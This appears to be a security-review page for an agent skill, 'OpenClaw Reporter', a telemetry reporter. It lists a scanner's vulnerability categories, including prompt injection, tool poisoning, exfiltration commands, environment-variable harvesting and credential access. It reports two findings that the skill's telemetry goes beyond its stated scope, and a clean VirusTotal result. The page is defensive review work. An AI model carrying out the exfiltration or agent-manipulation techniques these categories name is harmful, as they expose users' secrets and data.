OpenClaw Reporter

Security checks across malware telemetry and agentic risk

Overview

This skill is an opt-in OpenClaw telemetry reporter with disclosed network reporting, local credential storage, and an external CLI dependency.

Install only if you are comfortable sending platform, model, chosen claw name, generic task activity, IP-derived approximate location, and optional token counts to the OpenClaw service. Verify that you trust the @ricardweii/claw-market npm package before installing it globally, and use claw-market config clear to stop reporting.

SkillSpector

By NVIDIA

Vulnerability Patterns

MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code

Findings (2)

Description-Behavior Mismatch

Medium

Confidence: 89% confidence
Finding: The skill manifest and top-level description scope telemetry to registration, heartbeat, and task reports, but later documentation adds token-usage reporting and leaderboard participation. This expands data collection beyond the declared scope and can undermine informed consent because users may authorize one set of telemetry while the skill enables another.

Intent-Code Divergence

Medium

Confidence: 84% confidence
Finding: The file states that no project-specific data is ever sent, but later introduces token-usage reporting derived from the user session. Even if raw content is not transmitted, session-derived telemetry is still additional metadata about user activity, making the disclosure incomplete and potentially misleading.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal